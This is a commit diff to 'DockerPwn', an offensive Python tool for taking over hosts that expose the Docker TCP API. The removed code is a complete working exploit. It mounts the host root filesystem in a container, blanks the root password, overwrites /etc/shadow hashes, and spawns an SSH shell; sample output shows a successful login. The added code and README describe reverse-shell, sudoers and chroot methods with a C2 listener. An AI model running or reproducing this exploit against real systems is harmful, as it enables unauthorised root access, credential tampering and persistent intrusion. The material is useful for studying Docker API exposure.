AbsoZed
diff --git a/‎DockerPwn.py‎
Lines changed: 34 additions & 219 deletions b/‎DockerPwn.py‎
Lines changed: 34 additions & 219 deletions
diff --git a/‎README.md‎
Lines changed: 20 additions & 75 deletions b/‎README.md‎
Lines changed: 20 additions & 75 deletions
@@ -1,246 +1,61 @@
 #/usr/bin/python3
 
 '''
-Exploit for exposed Docker TCP Socket.
+Automation for abusing an exposed Docker TCP Socket.
 
-This will automatically create a container on the Docker host with the root filesystem mounted,
-allowing arbitrary read and write of the root filesystem (which is bad).
+This will automatically create a container on the Docker host with the host's root filesystem mounted,
+allowing arbitrary read and write of the host filesystem (which is bad).
 
-Once created, the script will empty the password requirement for 'root', and will alter any user
-with a valid Unix password to have a password of 'DockerPwn'
-
-Once this is done, the script will attempt to use Paramiko to login to all users enumerated from 
-/etc/passwd using the password 'DockerPwn', and a shell will be spawned. 
-
-Roadmap:
-
-Utilize the limited command execution via Paramiko to get a better shell, and automatically escalate to root.
-
-
-Usage:
-
-DockerPwn.py [-h] [--target TARGET] [--port PORT]
-
-optional arguments:
-  -h, --help       show this help message and exit
-  --target TARGET  IP of Docker Host
-  --port PORT      Docker API TCP Port
+Once created, the script will employ the method of your choosing for obtaining a root shell. Currently,
+shadow and useradd are working, with the less destructive method 'useradd' being default. 
 
 '''
-import sys
-import time
-import paramiko
+
 import argparse
-import socket
-import json
-import http.client
-import re
+import sys
+import createContainer
+import shadowPwn
+import userPwn
+import chrootPwn
+import shellHandler
 
 def main():
 
     parser = argparse.ArgumentParser()
     parser.add_argument("--target", help="IP of Docker Host", type=str)
     parser.add_argument("--port", help="Docker API TCP Port", type=int)
+    parser.add_argument("--image", help="Docker image to use. Default is Alpine Linux.", type=str)
+    parser.add_argument("--method", help="Method to use. Valid methods are shadow, chroot, useradd. Default is useradd.", type=str)
+    parser.add_argument("--c2", help="Local IP and port in [IP]:[PORT] format to receive the shell.", type=str)
     args = parser.parse_args()
     target = args.target
     port = args.port
+    image = args.image
+    method = args.method
+    c2 = args.c2
 
     if target is not None and port is not None:
-        makeRequest(target, port)
-    else:
-        print("[!] You must specify a target and port. Exiting.")
-        sys.exit(0)
-
-
-def makeRequest(target, port):
-    
-    dockerConnection = http.client.HTTPConnection(target, port)
+        
+        if image is None:
+            image = 'alpine'
 
-    headers = {
-        'X-Requested-With': 'DockerPwn.py',
-        'Content-Type': 'application/json',
-    }
-    
-    dockerConnection.request('GET', '/containers/json')
-    
-    apiProbeResponse = dockerConnection.getresponse()
+        containerID = createContainer.create(target, port, image)
+        
+        if method is None or method == 'useradd':
+            userPwn.attack(target, port, containerID, c2)
+            shellHandler.listen(c2, method)
 
+        elif method == 'shadow':
+            shadowPwn.attack(target, port, containerID, c2)
+            shellHandler.listen(c2, method)
 
-    if apiProbeResponse.status == 200:
-        print('\n\n[+] Successfully probed the API. Writing out list of containers just in case there\'s something cool.\n')
-        f = open("ContainerList.txt", "w+")
-        f.write(str(apiProbeResponse.read()))
-        f.close()
-        dockerConnection.close()
+        elif method == 'chroot':
+            chrootPwn.attack(target, port, containerID, c2)
+            shellHandler.listen(c2, method)
     else:
-        print('[-] API responded in unexpected way. Got ' + apiProbeResponse.status + ' ' + apiProbeResponse.reason)
-        dockerConnection.close()
+        print("[!] You must specify a target and port. Exiting.")
         sys.exit(0)
-
-    try:
-
-        print("[+] Downloading latest Alpine Image for a lightweight pwning experience.\n")
-
-        dockerConnection.request('POST', '/images/create?fromImage=alpine&tag=latest')
-        imageStatus = dockerConnection.getresponse()
-
-        if imageStatus.status == 200:
-            print("[+] Alpine image is downloading to the host. Hope we aren't setting off any alarms. Sleeping for a bit.\n")
-            dockerConnection.close()
-            timeout = time.time() + 60*4
-            while time.time() < timeout:
-	            cursorWait="\|/-\|/-"
-	            for l in cursorWait:
-		            sys.stdout.write(l)
-		            sys.stdout.flush()
-		            sys.stdout.write('\b')
-		            time.sleep(0.2)
-        else:
-            print('[-] API refused to download Alpine Linux. Exiting.')
-            dockerConnection.close()
-            sys.exit(0)
-
-        print("[+] Alright, creating Alpine Linux Container now...\n")
-
-        containerJSON = json.dumps({
-            "Hostname": "",
-            "Domainname": "",
-            "User": "",
-            "AttachStdin": True,
-            "AttachStdout": True,
-            "AttachStderr": True,
-            "Tty": True,
-            "OpenStdin": True,
-            "StdinOnce": True,
-            "Entrypoint": "/bin/sh",
-            "Image": "alpine",
-            "Volumes": {"/host/": {}},
-            "HostConfig": {"Binds": ["/:/host"]},
-        })
-
-        dockerConnection.request('POST', '/containers/create', containerJSON, headers)
-        creationResponse = dockerConnection.getresponse()
-
-        if creationResponse.status == 201:
-    
-            creationResponse = str(creationResponse.read())
-            containerID = re.findall(r'[A-Fa-f0-9]{64}', creationResponse)
-            print('[+] Success! Created container with root volume mounted. Got ID ' + containerID[0] + '!\n')
-            dockerConnection.close()
-        else:
-            print('[-] API did not return a valid container ID, no container created.')
-            dockerConnection.close()
-            sys.exit(0)
-
-        print('[+] Starting container ' + containerID[0] + '\n')
-        dockerConnection.request('POST', '/containers/' + containerID[0] + '/start')
-        startResponse = dockerConnection.getresponse()
-
-        if startResponse.status == 204:
-            print('[+] Container successfully started. Blue team will be with you shortly.\n')
-            dockerConnection.close()
-        else:
-            print('[-] Container refused to start. Maybe try again. Insert shrug emoji here.\n')
-            dockerConnection.close()
-            sys.exit(0)
-
-
-        print('[+] Phew, alright. Creating the EXEC to change passwords.\n')
-
-
-        execJSON = json.dumps({
-            "AttachStdin": True,
-            "AttachStdout": True,
-            "AttachStderr": True,
-            "Cmd": ["/bin/sh", "-c", "cat /host/etc/passwd | grep -oE '^[^:]+' | tr '\\n' ' ' && sed -i 's/root:x:/root::/g' /host/etc/passwd && sed -i -e 's/:$6[^:]\+:/:$6$ilDk.19ZUBhQbxkA$6rv9s1sJcecVNwwW2V9uEl4QlJ\/V0d5JK\/lXAAdSUF7W3b2oGmp37I2qm.2iNGt.JXqKdoW4oGHaUSgABP5vA.:/' /host/etc/shadow"],
-            "DetachKeys": "ctrl-p,ctrl-q",
-            "Privileged": True,
-            "Tty": True,
-        })
-        
-        dockerConnection.request('POST', '/containers/' + containerID[0] + '/exec', execJSON, headers)
-        execResponse = dockerConnection.getresponse()
 
-        if execResponse.status == 201:
-            execResponse = str(execResponse.read())
-            execID = re.findall(r'[A-Fa-f0-9]{64}', execResponse)
-            print('[+] EXEC successfully created on container! Got ID ' + execID[0] + '!\n')
-            dockerConnection.close()
-        else:
-            print('[-] EXEC creation failed. Maybe try again?\n')
-            dockerConnection.close()
-            sys.exit(0)
-
-        print('[+] Now triggering the EXEC to change passwords. Hope SSH is open...\n')
-
-        triggerJSON = json.dumps({
-            "Detach": False,
-            "Tty": False
-        })
-
-        dockerConnection.request('POST', '/exec/' + execID[0] + '/start', triggerJSON, headers)
-        triggerResponse = dockerConnection.getresponse()
-
-        if triggerResponse.status == 200:
-            print('[+] EXEC successfully triggered. Printing users found in /etc/passwd.\n')
-            try:
-                triggerResponse = str(triggerResponse.read())
-                triggerResponse = triggerResponse.split('root')[-1]
-                userList = triggerResponse.split(' ')
-                userList.insert(0, 'root')
-                userList.remove('')
-                userList.remove('\'')
-                print('[!] User List: ' + ' '.join(userList) + '\n')
-            except:
-                pass
-            dockerConnection.close()
-        else:
-            print('[-] EXEC job did not trigger. Maybe our ID was wrong?')
-            sys.exit(0)
-
-    except Exception as e:
-        print(e)
-
-    shellHandler(target, userList)
-
-def shellHandler(target, userList):
-
-    print('[+] OK, looking good. Attempting to open shell as root. This may take a minute or two.\n')
-
-    ssh = paramiko.SSHClient()
-    ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
 
-    for user in userList:
-        conn = 'null'
-        try:
-            conn = ssh.connect(target, 22, user, "DockerPwn")
-        except paramiko.AuthenticationException:
-            print('[-] Login failed for ' + user)
-            ssh.close()
-        if conn is None:
-            print('[+] Login succeeded for ' + user + '!\n')
-            while True:
-                prompt_response = input("DockerPwn@" + target + "> ")
-                stdin, stdout, stderr = ssh.exec_command(prompt_response, get_pty=True)
-                if stdout is not None:
-                    formattedOut = str(stdout.readlines())
-                    formattedOut = formattedOut.replace("[", "")
-                    formattedOut = formattedOut.replace("]", "")
-                    formattedOut = formattedOut.replace("'", "")
-                    formattedOut = formattedOut.replace("\\r\\n", "")
-                    formattedOut = formattedOut.replace(" , ", " ")
-                    print(formattedOut)
-                if stderr is not None:
-                    formattedErr = str(stdout.readlines())
-                    formattedErr = formattedErr.replace("[", "")
-                    formattedErr = formattedErr.replace("]", "")
-                    formattedErr = formattedErr.replace("'", "")
-                    formattedErr = formattedErr.replace("\\r\\n", "")
-                    formattedErr = formattedErr.replace(" , ", " ")
-                    print(formattedErr)
-            
-
-    
-
 if __name__ == '__main__':
-    main()
+    main()
@@ -9,90 +9,35 @@ Automation for abusing an exposed Docker TCP Socket.
 This will automatically create a container on the Docker host with the host's root filesystem mounted,
 allowing arbitrary read and write of the host filesystem (which is bad).
 
-Once created, the script will empty the password requirement for 'root', and will alter any user
-with a valid Unix password to have a password of 'DockerPwn'
+Once created, the script will employ the method of your choosing for obtaining a root shell. All methods are
+now working properly, and will return a reverse shell. Chroot is the least disruptive, but Useradd is the default.
 
-Once this is done, the script will attempt to use Paramiko to login to all users enumerated from 
-/etc/passwd using the password 'DockerPwn', and a shell will be spawned. 
+### Methods:
 
-## Roadmap:
+- All shell I/O is logged to './DockerPwn.log' for all methods.
+
+- Useradd: Creates a 'DockerPwn' user, and adds them to /etc/sudoers with NOPASSWD. The handler automatically escalates to
+         root using this privilege, and spawns a PTY.
+
+- Shadow: Changes root and any valid user passwords to 'DockerPwn' in /etc/shadow, authenticates with Paramiko, 
+          and sends a reverse shell. The handler automatically escalates to root utilzing 'su', and spawns a PTY.
 
-Utilize the limited command execution via Paramiko to get a better shell, and automatically escalate to root.
+- Chroot: Creates a shell.sh file which is a reverse shell, hosts on port 80. Downloads to /tmp, 
+          Utilizes chroot in docker container to execute shell in the context of the host, providing 
+          a container shell with interactivity to the host filesystem.
 
+## Roadmap:
+ 
+- SSL Support for :2376
 
 ## Usage:
 ```
-DockerPwn.py [-h] [--target TARGET] [--port PORT]
+DockerPwn.py [-h] [--target TARGET] [--port PORT] [--image IMAGE] [--method METHOD] [--c2 C2]
 
 optional arguments:
   -h, --help       show this help message and exit
   --target TARGET  IP of Docker Host
   --port PORT      Docker API TCP Port
- ```
-## Example Output:
-
-```
-Dylans-MacBook-Pro:~ dylan$ /usr/local/bin/python3 /Users/dylan/Documents/DockerPwn.py --target 192.168.0.20 --port 2375
-
-[+] Successfully probed the API. Writing out list of containers just in case there's something cool.
-
-[+] Downloading latest Alpine Image for a lightweight pwning experience.
-
-[+] Alpine image is downloading to the host. Hope we aren't setting off any alarms. Sleeping for a bit.
-
-[+] Alright, creating Alpine Linux Container now...
-
-[+] Success! Created container with root volume mounted. Got ID 40b99b62bfb89181985fb38d1e2c4928efc22d72f48e83f989f2e822cf19bb5c!
-
-[+] Starting container 40b99b62bfb89181985fb38d1e2c4928efc22d72f48e83f989f2e822cf19bb5c
-
-[+] Container successfully started. Blue team will be with you shortly.
-
-[+] Phew, alright. Creating the EXEC to change passwords.
-
-[+] EXEC successfully created on container! Got ID bc5ee929577554b9bc573b33c4a7e811542657a6aaeba6791d07bbdcc602103f!
-
-[+] Now triggering the EXEC to change passwords. Hope SSH is open...
-
-[+] EXEC successfully triggered. Printing users found in /etc/passwd.
-
-[!] User List: root daemon bin sys sync games man lp mail news uucp proxy www-data backup list irc gnats nobody systemd-network systemd-resolve syslog messagebus _apt lxd uuidd dnsmasq landscape pollinate sshd dylan
-
-[+] OK, looking good. Attempting to open shell as root. This may take a minute or two.
-
-[-] Login failed for root
-[-] Login failed for daemon
-[-] Login failed for bin
-[-] Login failed for sys
-[-] Login failed for sync
-[-] Login failed for games
-[-] Login failed for man
-[-] Login failed for lp
-[-] Login failed for mail
-[-] Login failed for news
-[-] Login failed for uucp
-[-] Login failed for proxy
-[-] Login failed for www-data
-[-] Login failed for backup
-[-] Login failed for list
-[-] Login failed for irc
-[-] Login failed for gnats
-[-] Login failed for nobody
-[-] Login failed for systemd-network
-[-] Login failed for systemd-resolve
-[-] Login failed for syslog
-[-] Login failed for messagebus
-[-] Login failed for _apt
-[-] Login failed for lxd
-[-] Login failed for uuidd
-[-] Login failed for dnsmasq
-[-] Login failed for landscape
-[-] Login failed for pollinate
-[-] Login failed for sshd
-[+] Login succeeded for dylan!
-
-DockerPwn@192.168.0.20> id
-uid=1000(dylan) gid=1000(dylan) groups=1000(dylan),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),108(lxd)
-
-DockerPwn@192.168.0.20> 
-```
+  --image IMAGE    Docker image to use. Default is Alpine Linux.
+  --method METHOD  Method to use. Valid methods are shadow, chroot, useradd. Default is useradd.
+  --c2 C2          Local IP and port in [IP]:[PORT] format to receive the shell.